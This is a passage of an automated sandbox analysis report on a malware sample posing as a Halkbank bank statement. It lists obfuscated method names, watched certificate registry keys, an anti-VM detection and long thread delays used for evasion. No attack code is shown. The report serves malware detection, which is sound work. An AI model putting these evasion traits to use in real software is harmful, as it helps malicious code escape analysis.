                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, pXiQGngKJHAxTaoAu6.csHigh entropy of concatenated method names: 'OjlAtNOEkF', 'cWcAVVNDix', 'wIVAg7ltOs', 'o1JA9bny1K', 'gBXAlucjik', 'sm4A7ZqEoL', 'sjdw3pQ7M8rNHUULhc', 'kMuh0QanupvwdoCZAG', 'UNcAAWtt3E', 'RcnAq3tDEe'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, C6LqXe7ZhCmGCf6YQf.csHigh entropy of concatenated method names: 'hhl04SdvZR', 'YBY03mHuUA', 'Hkg0ISOj8x', 'Dx60fDq20s', 'gtK0J7n6B5', 'qpJ0MbBe2M', 'aFC0aPkspm', 'VhT0ePBIvb', 'X7V0SpZykg', 'Jor0KBLQSt'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, N4uflNZUBmxHnLaKnc.csHigh entropy of concatenated method names: 'kqfsiyccYZ', 'TeDsGocSFB', 'kHVsWx4OLH', 'OtnstG78nF', 'FAtsVZgh07', 'r74W1Wf9Ik', 'uHgWdAkq21', 'o8jWCuFFhY', 'GInWFRvTOm', 'zsXWbyW9S6'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, XgHtcVWpxu9tyOjXNd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'QbQUb3P727', 'RmgUBpYij8', 'KK5UzuadjQ', 'VxoqHXI0tP', 'ehyqAiZHMJ', 'MlrqUK1IN8', 'A8DqqVAOtP', 'gMX6dWgcubmpT2CuI4E'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, iWk2BpmdKZQmbajR8p.csHigh entropy of concatenated method names: 'rCLkIENXTJ', 't4dkfRjepn', 'nWUkDNMOYk', 'yxjkJh9kew', 'gT1kjNs0vT', 'fTDkMpa3Rw', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, wmDBajVNd98VIVRuG2.csHigh entropy of concatenated method names: 'UnFWThgTPD', 'YJnWhcWfTQ', 'FA8QDaHJJH', 'fGTQJ1UUMe', 'ddGQM1U2xh', 'AQKQ2FXJhB', 'IbRQaoNO9N', 'JsuQe5CXn6', 'DJ2QXYetHL', 'TpuQSDQwfZ'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, lRRIqr2t2v0WVf5PlP.csHigh entropy of concatenated method names: 'hfh8ASyFfO', 'RH08qmaeba', 'DEl8RHpq9d', 'WYO8mTLBc0', 'aXM8G2jrsO', 'CCm8Wq4Cv5', 'Sfk8sxBuHR', 'hnrkCg3K4K', 'IglkFsae7S', 'YYUkbcZI5a'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.7300000.11.raw.unpack, EnE7sFddoOZbauWubq.csHigh entropy of concatenated method names: 'Dispose', 'RSpAbGdr9q', 'XowUf8J6OY', 'CSEyyuXuTY', 'MtCABuVvkA', 'QLTAzxD6lm', 'ProcessDialogKey', 'XA6UH5EF25', 'oPIUAJZDNA', 'TPhUUN2Sem'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, FHTwk1OmDHvQcjT4D9.csHigh entropy of concatenated method names: 'q1RqieZmx3', 'NAqqmLohun', 'ocoqG1tuFW', 'RiKqQ0CKxd', 'IthqWoIpKn', 'NcFqsjeivw', 'cAeqt1yEHP', 'y9GqVRDjto', 'Nfkq6sbTfC', 'LIHqgj7aEX'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, ziedvnrBRhAIpT5Qi8.csHigh entropy of concatenated method names: 'Yu6nusVhf', 'pupvFh3A3', 'K3iLiTqTb', 'CqdhAd9Ve', 'wFc3Nmrpx', 'IqNrl0b8g', 'pLpCtFN4ruVv7NeP5k', 'cgI6uRmUl2ALWDGbqp', 'tWQkkLgAs', 'ucTZjVc2U'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, awHOa2tvZC3B51kOtt.csHigh entropy of concatenated method names: 'kPwkmvjKC7', 'j2kkGhLo6K', 'D9KkQcZLkA', 'qlBkWGnBRf', 'Gm6ksnhE7E', 'z09kt8Aa8i', 'hUFkVfnDX9', 'xgLk64xoMJ', 'aMykgRRiQo', 'BN2k9uTFDM'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, od4j2WLp01hKGvRovU.csHigh entropy of concatenated method names: 'ToString', 'tpj7KJWl7s', 'uRC7ftHy78', 'ydK7DnGIwS', 'Bp47Jv9MNk', 'P1T7MqsL70', 'kEr72nXW3m', 'pcm7aKwGke', 'jBu7eGBYQZ', 'jt77XEnsjb'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, cfK2jui8T0oYumsHiO.csHigh entropy of concatenated method names: 'S3JtYCdBaj', 'fHwtP3MXdu', 'DT8tnSSet7', 'u36tvts1U3', 'Y1WtToE70S', 'z34tL7FHGj', 'UWmthBTstI', 'Ow9t4mG3gA', 'iCNt3sHWYq', 'fnRtrhLfOi'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, JtOE33hfZH9hFUu4kMg.csHigh entropy of concatenated method names: 'HN38YKmY8V', 'zHt8PHc0II', 'u6P8nhRk9I', 'Paf8vvsToJ', 'sen8Tex6u1', 'mkW8Llc2Vk', 'z9M8hbfGSv', 'wno84c7Sfe', 'o4s83eoT2u', 'Y0X8rpEikK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, bMHWQvIvpUEgKY4Zg9.csHigh entropy of concatenated method names: 'K9HlSbKuFP', 'bpjlw9N9Ta', 'd6dljoDKuE', 'yX8lEfZQXj', 'ucVlfyVauf', 'Ko3lDXkeyO', 'cmVlJfxesS', 'niilMPaJIe', 'L6fl2SrmGi', 'jmUlaNlBOK'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, t5mbvvPGfGMR4sTcBJ.csHigh entropy of concatenated method names: 'gsTNFLRRiD', 'oPmNBStXwf', 'SwbkH3ZjDg', 'gKBkAUAhsT', 'KyBNKOOvhT', 'QShNw4KOAl', 'Hj2NokQIAA', 'j5jNjdWtuY', 'VkLNElKVqi', 'UNcN5BnIXw'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, l1Qrv9zHACbYjdnnW9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EHQ80L4ZVB', 'fZc8lGI0L3', 'FR687La5NE', 'h5W8NmZr9Z', 'n6R8kpKkKM', 'fsx887iYCx', 'R198ZnnWr4'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, xPlBfKlGB2IZMVKKlN.csHigh entropy of concatenated method names: 'a0ZGjML0ZT', 'pKKGE6Z35U', 'Tp0G5tIssF', 'bemGp7phEW', 'TxxG1LldcX', 'hWQGdMNKrj', 'FtXGCLNq5M', 'fP8GFJd42S', 'iUrGbKshS1', 'IVWGBwJMUc'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, AX4t7qyE4jux1hf1Y6.csHigh entropy of concatenated method names: 'Oy9Qv4PvXm', 'P8dQL9LBKC', 'yabQ48llFn', 'acLQ3l9vgA', 'BY6QldWMk2', 'xVeQ7fS5O2', 'WDOQNt4Slf', 'KZ1QkhOxIK', 'gFPQ8gNyNI', 'WZqQZctj56'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, OMxwkrxpKFZmqViVRi.csHigh entropy of concatenated method names: 'YbUtmcbP2C', 'ue4tQHJwiq', 'bwvts0FNnp', 'T51sBAdueg', 'b3mszGAlTK', 'Wt5tHv2XNH', 'Y5OtAiHDin', 'j27tUOQI67', 'BZUtqsRI5G', 'rMFtRlBA5Z'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, HG4SfGhYBDdbP6jIh6a.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OCCZj2lJB1', 'uO0ZEgdHMO', 'mvQZ5x2XDs', 'T82ZpArCY3', 'p0xZ1OnGvb', 'NArZdKxQgA', 'kn3ZCCMU3D'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, pXiQGngKJHAxTaoAu6.csHigh entropy of concatenated method names: 'OjlAtNOEkF', 'cWcAVVNDix', 'wIVAg7ltOs', 'o1JA9bny1K', 'gBXAlucjik', 'sm4A7ZqEoL', 'sjdw3pQ7M8rNHUULhc', 'kMuh0QanupvwdoCZAG', 'UNcAAWtt3E', 'RcnAq3tDEe'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, C6LqXe7ZhCmGCf6YQf.csHigh entropy of concatenated method names: 'hhl04SdvZR', 'YBY03mHuUA', 'Hkg0ISOj8x', 'Dx60fDq20s', 'gtK0J7n6B5', 'qpJ0MbBe2M', 'aFC0aPkspm', 'VhT0ePBIvb', 'X7V0SpZykg', 'Jor0KBLQSt'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, N4uflNZUBmxHnLaKnc.csHigh entropy of concatenated method names: 'kqfsiyccYZ', 'TeDsGocSFB', 'kHVsWx4OLH', 'OtnstG78nF', 'FAtsVZgh07', 'r74W1Wf9Ik', 'uHgWdAkq21', 'o8jWCuFFhY', 'GInWFRvTOm', 'zsXWbyW9S6'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, XgHtcVWpxu9tyOjXNd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'QbQUb3P727', 'RmgUBpYij8', 'KK5UzuadjQ', 'VxoqHXI0tP', 'ehyqAiZHMJ', 'MlrqUK1IN8', 'A8DqqVAOtP', 'gMX6dWgcubmpT2CuI4E'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, iWk2BpmdKZQmbajR8p.csHigh entropy of concatenated method names: 'rCLkIENXTJ', 't4dkfRjepn', 'nWUkDNMOYk', 'yxjkJh9kew', 'gT1kjNs0vT', 'fTDkMpa3Rw', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, wmDBajVNd98VIVRuG2.csHigh entropy of concatenated method names: 'UnFWThgTPD', 'YJnWhcWfTQ', 'FA8QDaHJJH', 'fGTQJ1UUMe', 'ddGQM1U2xh', 'AQKQ2FXJhB', 'IbRQaoNO9N', 'JsuQe5CXn6', 'DJ2QXYetHL', 'TpuQSDQwfZ'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, lRRIqr2t2v0WVf5PlP.csHigh entropy of concatenated method names: 'hfh8ASyFfO', 'RH08qmaeba', 'DEl8RHpq9d', 'WYO8mTLBc0', 'aXM8G2jrsO', 'CCm8Wq4Cv5', 'Sfk8sxBuHR', 'hnrkCg3K4K', 'IglkFsae7S', 'YYUkbcZI5a'
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a87600.8.raw.unpack, EnE7sFddoOZbauWubq.csHigh entropy of concatenated method names: 'Dispose', 'RSpAbGdr9q', 'XowUf8J6OY', 'CSEyyuXuTY', 'MtCABuVvkA', 'QLTAzxD6lm', 'ProcessDialogKey', 'XA6UH5EF25', 'oPIUAJZDNA', 'TPhUUN2Sem'
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 7370000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 8370000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 8610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 9610000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 599110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598860Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 597860Jump to behavior
